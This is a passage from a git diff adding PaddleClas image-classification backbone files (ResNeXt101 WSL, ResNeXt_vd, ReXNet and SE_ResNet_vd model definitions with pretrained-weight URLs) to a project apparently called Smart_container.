width=self.width, + name="layer2.0") + self._conv2_1 = BottleneckBlock( + num_filters[1] // (width // 8), + num_filters[1], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer2.1") + self._conv2_2 = BottleneckBlock( + num_filters[1] // (width // 8), + num_filters[1], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer2.2") + self._conv2_3 = BottleneckBlock( + num_filters[1] // (width // 8), + num_filters[1], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer2.3") + + self._conv3_0 = BottleneckBlock( + num_filters[1] // (width // 8), + num_filters[2], + stride=2, + cardinality=self.cardinality, + width=self.width, + name="layer3.0") + self._conv3_1 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.1") + self._conv3_2 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.2") + self._conv3_3 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.3") + self._conv3_4 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.4") + self._conv3_5 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.5") + self._conv3_6 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.6") + self._conv3_7 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.7") + self._conv3_8 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.8") + self._conv3_9 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.9") + self._conv3_10 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.10") + self._conv3_11 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.11") + self._conv3_12 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.12") + self._conv3_13 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.13") + self._conv3_14 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.14") + self._conv3_15 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.15") + self._conv3_16 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.16") + self._conv3_17 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.17") + self._conv3_18 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.18") + self._conv3_19 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.19") + self._conv3_20 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.20") + self._conv3_21 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.21") + self._conv3_22 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[2], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer3.22") + + self._conv4_0 = BottleneckBlock( + num_filters[2] // (width // 8), + num_filters[3], + stride=2, + cardinality=self.cardinality, + width=self.width, + name="layer4.0") + self._conv4_1 = BottleneckBlock( + num_filters[3] // (width // 8), + num_filters[3], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer4.1") + self._conv4_2 = BottleneckBlock( + num_filters[3] // (width // 8), + num_filters[3], + stride=1, + cardinality=self.cardinality, + width=self.width, + name="layer4.2") + + self._avg_pool = AdaptiveAvgPool2D(1) + self._out = Linear( + num_filters[3] // (width // 8), + class_num, + weight_attr=ParamAttr(name="fc.weight"), + bias_attr=ParamAttr(name="fc.bias")) + + def forward(self, inputs): + x = self._conv_stem(inputs) + x = self._pool(x) + + x = self._conv1_0(x) + x = self._conv1_1(x) + x = self._conv1_2(x) + + x = self._conv2_0(x) + x = self._conv2_1(x) + x = self._conv2_2(x) + x = self._conv2_3(x) + + x = self._conv3_0(x) + x = self._conv3_1(x) + x = self._conv3_2(x) + x = self._conv3_3(x) + x = self._conv3_4(x) + x = self._conv3_5(x) + x = self._conv3_6(x) + x = self._conv3_7(x) + x = self._conv3_8(x) + x = self._conv3_9(x) + x = self._conv3_10(x) + x = self._conv3_11(x) + x = self._conv3_12(x) + x = self._conv3_13(x) + x = self._conv3_14(x) + x = self._conv3_15(x) + x = self._conv3_16(x) + x = self._conv3_17(x) + x = self._conv3_18(x) + x = self._conv3_19(x) + x = self._conv3_20(x) + x = self._conv3_21(x) + x = self._conv3_22(x) + + x = self._conv4_0(x) + x = self._conv4_1(x) + x = self._conv4_2(x) + + x = self._avg_pool(x) + x = paddle.squeeze(x, axis=[2, 3]) + x = self._out(x) + return x + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def ResNeXt101_32x8d_wsl(pretrained=False, use_ssld=False, **kwargs): + model = ResNeXt101WSL(cardinality=32, width=8, **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["ResNeXt101_32x8d_wsl"], + use_ssld=use_ssld) + return model + + +def ResNeXt101_32x16d_wsl(pretrained=False, use_ssld=False, **kwargs): + model = ResNeXt101WSL(cardinality=32, width=16, **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["ResNeXt101_32x16d_wsl"], + use_ssld=use_ssld) + return model + + +def ResNeXt101_32x32d_wsl(pretrained=False, use_ssld=False, **kwargs): + model = ResNeXt101WSL(cardinality=32, width=32, **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["ResNeXt101_32x32d_wsl"], + use_ssld=use_ssld) + return model + + +def ResNeXt101_32x48d_wsl(pretrained=False, use_ssld=False, **kwargs): + model = ResNeXt101WSL(cardinality=32, width=48, **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["ResNeXt101_32x48d_wsl"], + use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/resnext_vd.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/resnext_vd.py new file mode 100644 index 0000000..b2bd484 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/resnext_vd.py @@ -0,0 +1,317 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import numpy as np +import paddle +from paddle import ParamAttr +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D +from paddle.nn.initializer import Uniform + +import math + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "ResNeXt50_vd_32x4d": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeXt50_vd_32x4d_pretrained.pdparams", + "ResNeXt50_vd_64x4d": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeXt50_vd_64x4d_pretrained.pdparams", + "ResNeXt101_vd_32x4d": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeXt101_vd_32x4d_pretrained.pdparams", + "ResNeXt101_vd_64x4d": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeXt101_vd_64x4d_pretrained.pdparams", + "ResNeXt152_vd_32x4d": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeXt152_vd_32x4d_pretrained.pdparams", + "ResNeXt152_vd_64x4d": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ResNeXt152_vd_64x4d_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + + +class ConvBNLayer(nn.Layer): + def __init__( + self, + num_channels, + num_filters, + filter_size, + stride=1, + groups=1, + is_vd_mode=False, + act=None, + name=None, ): + super(ConvBNLayer, self).__init__() + + self.is_vd_mode = is_vd_mode + self._pool2d_avg = AvgPool2D( + kernel_size=2, stride=2, padding=0, ceil_mode=True) + self._conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=(filter_size - 1) // 2, + groups=groups, + weight_attr=ParamAttr(name=name + "_weights"), + bias_attr=False) + if name == "conv1": + bn_name = "bn_" + name + else: + bn_name = "bn" + name[3:] + self._batch_norm = BatchNorm( + num_filters, + act=act, + param_attr=ParamAttr(name=bn_name + '_scale'), + bias_attr=ParamAttr(bn_name + '_offset'), + moving_mean_name=bn_name + '_mean', + moving_variance_name=bn_name + '_variance') + + def forward(self, inputs): + if self.is_vd_mode: + inputs = self._pool2d_avg(inputs) + y = self._conv(inputs) + y = self._batch_norm(y) + return y + + +class BottleneckBlock(nn.Layer): + def __init__(self, + num_channels, + num_filters, + stride, + cardinality, + shortcut=True, + if_first=False, + name=None): + super(BottleneckBlock, self).__init__() + + self.conv0 = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters, + filter_size=1, + act='relu', + name=name + "_branch2a") + self.conv1 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters, + filter_size=3, + groups=cardinality, + stride=stride, + act='relu', + name=name + "_branch2b") + self.conv2 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters * 2 if cardinality == 32 else num_filters, + filter_size=1, + act=None, + name=name + "_branch2c") + + if not shortcut: + self.short = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters * 2 + if cardinality == 32 else num_filters, + filter_size=1, + stride=1, + is_vd_mode=False if if_first else True, + name=name + "_branch1") + + self.shortcut = shortcut + + def forward(self, inputs): + y = self.conv0(inputs) + conv1 = self.conv1(y) + conv2 = self.conv2(conv1) + + if self.shortcut: + short = inputs + else: + short = self.short(inputs) + + y = paddle.add(x=short, y=conv2) + y = F.relu(y) + return y + + +class ResNeXt(nn.Layer): + def __init__(self, layers=50, class_num=1000, cardinality=32): + super(ResNeXt, self).__init__() + + self.layers = layers + self.cardinality = cardinality + supported_layers = [50, 101, 152] + assert layers in supported_layers, \ + "supported layers are {} but input layer is {}".format( + supported_layers, layers) + supported_cardinality = [32, 64] + assert cardinality in supported_cardinality, \ + "supported cardinality is {} but input cardinality is {}" \ + .format(supported_cardinality, cardinality) + if layers == 50: + depth = [3, 4, 6, 3] + elif layers == 101: + depth = [3, 4, 23, 3] + elif layers == 152: + depth = [3, 8, 36, 3] + num_channels = [64, 256, 512, 1024] + num_filters = [128, 256, 512, + 1024] if cardinality == 32 else [256, 512, 1024, 2048] + + self.conv1_1 = ConvBNLayer( + num_channels=3, + num_filters=32, + filter_size=3, + stride=2, + act='relu', + name="conv1_1") + self.conv1_2 = ConvBNLayer( + num_channels=32, + num_filters=32, + filter_size=3, + stride=1, + act='relu', + name="conv1_2") + self.conv1_3 = ConvBNLayer( + num_channels=32, + num_filters=64, + filter_size=3, + stride=1, + act='relu', + name="conv1_3") + + self.pool2d_max = MaxPool2D(kernel_size=3, stride=2, padding=1) + + self.block_list = [] + for block in range(len(depth)): + shortcut = False + for i in range(depth[block]): + if layers in [101, 152] and block == 2: + if i == 0: + conv_name = "res" + str(block + 2) + "a" + else: + conv_name = "res" + str(block + 2) + "b" + str(i) + else: + conv_name = "res" + str(block + 2) + chr(97 + i) + bottleneck_block = self.add_sublayer( + 'bb_%d_%d' % (block, i), + BottleneckBlock( + num_channels=num_channels[block] if i == 0 else + num_filters[block] * int(64 // self.cardinality), + num_filters=num_filters[block], + stride=2 if i == 0 and block != 0 else 1, + cardinality=self.cardinality, + shortcut=shortcut, + if_first=block == i == 0, + name=conv_name)) + self.block_list.append(bottleneck_block) + shortcut = True + + self.pool2d_avg = AdaptiveAvgPool2D(1) + + self.pool2d_avg_channels = num_channels[-1] * 2 + + stdv = 1.0 / math.sqrt(self.pool2d_avg_channels * 1.0) + + self.out = Linear( + self.pool2d_avg_channels, + class_num, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name="fc_weights"), + bias_attr=ParamAttr(name="fc_offset")) + + def forward(self, inputs): + y = self.conv1_1(inputs) + y = self.conv1_2(y) + y = self.conv1_3(y) + y = self.pool2d_max(y) + for block in self.block_list: + y = block(y) + y = self.pool2d_avg(y) + y = paddle.reshape(y, shape=[-1, self.pool2d_avg_channels]) + y = self.out(y) + return y + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def ResNeXt50_vd_32x4d(pretrained=False, use_ssld=False, **kwargs): + model = ResNeXt(layers=50, cardinality=32, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ResNeXt50_vd_32x4d"], use_ssld=use_ssld) + return model + + +def ResNeXt50_vd_64x4d(pretrained=False, use_ssld=False, **kwargs): + model = ResNeXt(layers=50, cardinality=64, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ResNeXt50_vd_64x4d"], use_ssld=use_ssld) + return model + + +def ResNeXt101_vd_32x4d(pretrained=False, use_ssld=False, **kwargs): + model = ResNeXt(layers=101, cardinality=32, **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["ResNeXt101_vd_32x4d"], + use_ssld=use_ssld) + return model + + +def ResNeXt101_vd_64x4d(pretrained=False, use_ssld=False, **kwargs): + model = ResNeXt(layers=101, cardinality=64, **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["ResNeXt101_vd_64x4d"], + use_ssld=use_ssld) + return model + + +def ResNeXt152_vd_32x4d(pretrained=False, use_ssld=False, **kwargs): + model = ResNeXt(layers=152, cardinality=32, **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["ResNeXt152_vd_32x4d"], + use_ssld=use_ssld) + return model + + +def ResNeXt152_vd_64x4d(pretrained=False, use_ssld=False, **kwargs): + model = ResNeXt(layers=152, cardinality=64, **kwargs) + _load_pretrained( + pretrained, + model, + MODEL_URLS["ResNeXt152_vd_64x4d"], + use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/rexnet.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/rexnet.py new file mode 100644 index 0000000..039f6c5 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/rexnet.py @@ -0,0 +1,281 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import numpy as np +import paddle +from paddle import ParamAttr +import paddle.nn as nn +from math import ceil + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "ReXNet_1_0": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ReXNet_1_0_pretrained.pdparams", + "ReXNet_1_3": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ReXNet_1_3_pretrained.pdparams", + "ReXNet_1_5": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ReXNet_1_5_32x4d_pretrained.pdparams", + "ReXNet_2_0": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ReXNet_2_0_pretrained.pdparams", + "ReXNet_3_0": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/ReXNet_3_0_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + + +def conv_bn_act(out, + in_channels, + channels, + kernel=1, + stride=1, + pad=0, + num_group=1, + active=True, + relu6=False): + out.append( + nn.Conv2D( + in_channels, + channels, + kernel, + stride, + pad, + groups=num_group, + bias_attr=False)) + out.append(nn.BatchNorm2D(channels)) + if active: + out.append(nn.ReLU6() if relu6 else nn.ReLU()) + + +def conv_bn_swish(out, + in_channels, + channels, + kernel=1, + stride=1, + pad=0, + num_group=1): + out.append( + nn.Conv2D( + in_channels, + channels, + kernel, + stride, + pad, + groups=num_group, + bias_attr=False)) + out.append(nn.BatchNorm2D(channels)) + out.append(nn.Swish()) + + +class SE(nn.Layer): + def __init__(self, in_channels, channels, se_ratio=12): + super(SE, self).__init__() + self.avg_pool = nn.AdaptiveAvgPool2D(1) + self.fc = nn.Sequential( + nn.Conv2D( + in_channels, channels // se_ratio, kernel_size=1, padding=0), + nn.BatchNorm2D(channels // se_ratio), + nn.ReLU(), + nn.Conv2D( + channels // se_ratio, channels, kernel_size=1, padding=0), + nn.Sigmoid()) + + def forward(self, x): + y = self.avg_pool(x) + y = self.fc(y) + return x * y + + +class LinearBottleneck(nn.Layer): + def __init__(self, + in_channels, + channels, + t, + stride, + use_se=True, + se_ratio=12, + **kwargs): + super(LinearBottleneck, self).__init__(**kwargs) + self.use_shortcut = stride == 1 and in_channels <= channels + self.in_channels = in_channels + self.out_channels = channels + + out = [] + if t != 1: + dw_channels = in_channels * t + conv_bn_swish(out, in_channels=in_channels, channels=dw_channels) + else: + dw_channels = in_channels + + conv_bn_act( + out, + in_channels=dw_channels, + channels=dw_channels, + kernel=3, + stride=stride, + pad=1, + num_group=dw_channels, + active=False) + + if use_se: + out.append(SE(dw_channels, dw_channels, se_ratio)) + + out.append(nn.ReLU6()) + conv_bn_act( + out, + in_channels=dw_channels, + channels=channels, + active=False, + relu6=True) + self.out = nn.Sequential(*out) + + def forward(self, x): + out = self.out(x) + if self.use_shortcut: + out[:, 0:self.in_channels] += x + + return out + + +class ReXNetV1(nn.Layer): + def __init__(self, + input_ch=16, + final_ch=180, + width_mult=1.0, + depth_mult=1.0, + class_num=1000, + use_se=True, + se_ratio=12, + dropout_ratio=0.2, + bn_momentum=0.9): + super(ReXNetV1, self).__init__() + + layers = [1, 2, 2, 3, 3, 5] + strides = [1, 2, 2, 2, 1, 2] + use_ses = [False, False, True, True, True, True] + + layers = [ceil(element * depth_mult) for element in layers] + strides = sum([[element] + [1] * (layers[idx] - 1) + for idx, element in enumerate(strides)], []) + if use_se: + use_ses = sum([[element] * layers[idx] + for idx, element in enumerate(use_ses)], []) + else: + use_ses = [False] * sum(layers[:]) + ts = [1] * layers[0] + [6] * sum(layers[1:]) + + self.depth = sum(layers[:]) * 3 + stem_channel = 32 / width_mult if width_mult < 1.0 else 32 + inplanes = input_ch / width_mult if width_mult < 1.0 else input_ch + + features = [] + in_channels_group = [] + channels_group = [] + + # The following channel configuration is a simple instance to make each layer become an expand layer. + for i in range(self.depth // 3): + if i == 0: + in_channels_group.append(int(round(stem_channel * width_mult))) + channels_group.append(int(round(inplanes * width_mult))) + else: + in_channels_group.append(int(round(inplanes * width_mult))) + inplanes += final_ch / (self.depth // 3 * 1.0) + channels_group.append(int(round(inplanes * width_mult))) + + conv_bn_swish( + features, + 3, + int(round(stem_channel * width_mult)), + kernel=3, + stride=2, + pad=1) + + for block_idx, (in_c, c, t, s, se) in enumerate( + zip(in_channels_group, channels_group, ts, strides, use_ses)): + features.append( + LinearBottleneck( + in_channels=in_c, + channels=c, + t=t, + stride=s, + use_se=se, + se_ratio=se_ratio)) + + pen_channels = int(1280 * width_mult) + conv_bn_swish(features, c, pen_channels) + + features.append(nn.AdaptiveAvgPool2D(1)) + self.features = nn.Sequential(*features) + self.output = nn.Sequential( + nn.Dropout(dropout_ratio), + nn.Conv2D( + pen_channels, class_num, 1, bias_attr=True)) + + def forward(self, x): + x = self.features(x) + x = self.output(x).squeeze(axis=-1).squeeze(axis=-1) + return x + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def ReXNet_1_0(pretrained=False, use_ssld=False, **kwargs): + model = ReXNetV1(width_mult=1.0, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ReXNet_1_0"], use_ssld=use_ssld) + return model + + +def ReXNet_1_3(pretrained=False, use_ssld=False, **kwargs): + model = ReXNetV1(width_mult=1.3, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ReXNet_1_3"], use_ssld=use_ssld) + return model + + +def ReXNet_1_5(pretrained=False, use_ssld=False, **kwargs): + model = ReXNetV1(width_mult=1.5, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ReXNet_1_5"], use_ssld=use_ssld) + return model + + +def ReXNet_2_0(pretrained=False, use_ssld=False, **kwargs): + model = ReXNetV1(width_mult=2.0, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ReXNet_2_0"], use_ssld=use_ssld) + return model + + +def ReXNet_3_0(pretrained=False, use_ssld=False, **kwargs): + model = ReXNetV1(width_mult=3.0, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ReXNet_3_0"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/se_resnet_vd.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/se_resnet_vd.py new file mode 100644 index 0000000..205feec --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/se_resnet_vd.py @@ -0,0 +1,390 @@ +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import numpy as np +import paddle +from paddle import ParamAttr +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn import Conv2D, BatchNorm, Linear, Dropout +from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D +from paddle.nn.initializer import Uniform + +import math + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "SE_ResNet18_vd": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/SE_ResNet18_vd_pretrained.pdparams", + "SE_ResNet34_vd": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/SE_ResNet34_vd_pretrained.pdparams", + "SE_ResNet50_vd": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/SE_ResNet50_vd_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + + +class ConvBNLayer(nn.Layer): + def __init__( + self, + num_channels, + num_filters, + filter_size, + stride=1, + groups=1, + is_vd_mode=False, + act=None, + name=None, ): + super(ConvBNLayer, self).__init__() + + self.is_vd_mode = is_vd_mode + self._pool2d_avg = AvgPool2D( + kernel_size=2, stride=2, padding=0, ceil_mode=True) + + self._conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=(filter_size - 1) // 2, + groups=groups, + weight_attr=ParamAttr(name=name + "_weights"), + bias_attr=False) + if name == "conv1": + bn_name = "bn_" + name + else: + bn_name = "bn" + name[3:] + self._batch_norm = BatchNorm( + num_filters, + act=act, + param_attr=ParamAttr(name=bn_name + '_scale'), + bias_attr=ParamAttr(bn_name + '_offset'), + moving_mean_name=bn_name + '_mean', + moving_variance_name=bn_name + '_variance') + + def forward(self, inputs): + if self.is_vd_mode: + inputs = self._pool2d_avg(inputs) + y = self._conv(inputs) + y = self._batch_norm(y) + return y + + +class BottleneckBlock(nn.Layer): + def __init__(self, + num_channels, + num_filters, + stride, + shortcut=True, + if_first=False, + reduction_ratio=16, + name=None): + super(BottleneckBlock, self).__init__() + + self.conv0 = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters, + filter_size=1, + act='relu', + name=name + "_branch2a") + self.conv1 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters, + filter_size=3, + stride=stride, + act='relu', + name=name + "_branch2b") + self.conv2 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters * 4, + filter_size=1, + act=None, + name=name + "_branch2c") + self.scale = SELayer( + num_channels=num_filters * 4, + num_filters=num_filters * 4, + reduction_ratio=reduction_ratio, + name='fc_' + name) + + if not shortcut: + self.short = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters * 4, + filter_size=1, + stride=1, + is_vd_mode=False if if_first else True, + name=name + "_branch1") + + self.shortcut = shortcut + + def forward(self, inputs): + y = self.conv0(inputs) + conv1 = self.conv1(y) + conv2 = self.conv2(conv1) + scale = self.scale(conv2) + + if self.shortcut: + short = inputs + else: + short = self.short(inputs) + y = paddle.add(x=short, y=scale) + y = F.relu(y) + return y + + +class BasicBlock(nn.Layer): + def __init__(self, + num_channels, + num_filters, + stride, + shortcut=True, + if_first=False, + reduction_ratio=16, + name=None): + super(BasicBlock, self).__init__() + self.stride = stride + self.conv0 = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters, + filter_size=3, + stride=stride, + act='relu', + name=name + "_branch2a") + self.conv1 = ConvBNLayer( + num_channels=num_filters, + num_filters=num_filters, + filter_size=3, + act=None, + name=name + "_branch2b") + + self.scale = SELayer( + num_channels=num_filters, + num_filters=num_filters, + reduction_ratio=reduction_ratio, + name='fc_' + name) + + if not shortcut: + self.short = ConvBNLayer( + num_channels=num_channels, + num_filters=num_filters, + filter_size=1, + stride=1, + is_vd_mode=False if if_first else True, + name=name + "_branch1") + + self.shortcut = shortcut + + def forward(self, inputs): + y = self.conv0(inputs) + conv1 = self.conv1(y) + scale = self.scale(conv1) + + if self.shortcut: + short = inputs + else: + short = self.short(inputs) + y = paddle.add(x=short, y=scale) + y = F.relu(y) + return y + + +class SELayer(nn.Layer): + def __init__(self, num_channels, num_filters, reduction_ratio, name=None): + super(SELayer, self).__init__() + + self.pool2d_gap = AdaptiveAvgPool2D(1) + + self._num_channels = num_channels + + med_ch = int(num_channels / reduction_ratio) + stdv = 1.0 / math.sqrt(num_channels * 1.0) + self.squeeze = Linear( + num_channels, + med_ch, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name=name + "_sqz_weights"), + bias_attr=ParamAttr(name=name + '_sqz_offset')) + + stdv = 1.0 / math.sqrt(med_ch * 1.0) + self.excitation = Linear( + med_ch, + num_filters, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name=name + "_exc_weights"), + bias_attr=ParamAttr(name=name + '_exc_offset')) + + def forward(self, input): + pool = self.pool2d_gap(input) + pool = paddle.squeeze(pool, axis=[2, 3]) + squeeze = self.squeeze(pool) + squeeze = F.relu(squeeze) + excitation = self.excitation(squeeze) + excitation = F.sigmoid(excitation) + excitation = paddle.unsqueeze(excitation, axis=[2, 3]) + out = input * excitation + return out + + +class SE_ResNet_vd(nn.Layer): + def __init__(self, layers=50, class_num=1000): + super(SE_ResNet_vd, self).__init__() + + self.layers = layers + supported_layers = [18, 34, 50, 101, 152, 200] + assert layers in supported_layers, \ + "supported layers are {} but input layer is {}".format( + supported_layers, layers) + + if layers == 18: + depth = [2, 2, 2, 2] + elif layers == 34 or layers == 50: + depth = [3, 4, 6, 3] + elif layers == 101: + depth = [3, 4, 23, 3] + elif layers == 152: + depth = [3, 8, 36, 3] + elif layers == 200: + depth = [3, 12, 48, 3] + num_channels = [64, 256, 512, + 1024] if layers >= 50 else [64, 64, 128, 256] + num_filters = [64, 128, 256, 512] + + self.conv1_1 = ConvBNLayer( + num_channels=3, + num_filters=32, + filter_size=3, + stride=2, + act='relu', + name="conv1_1") + self.conv1_2 = ConvBNLayer( + num_channels=32, + num_filters=32, + filter_size=3, + stride=1, + act='relu', + name="conv1_2") + self.conv1_3 = ConvBNLayer( + num_channels=32, + num_filters=64, + 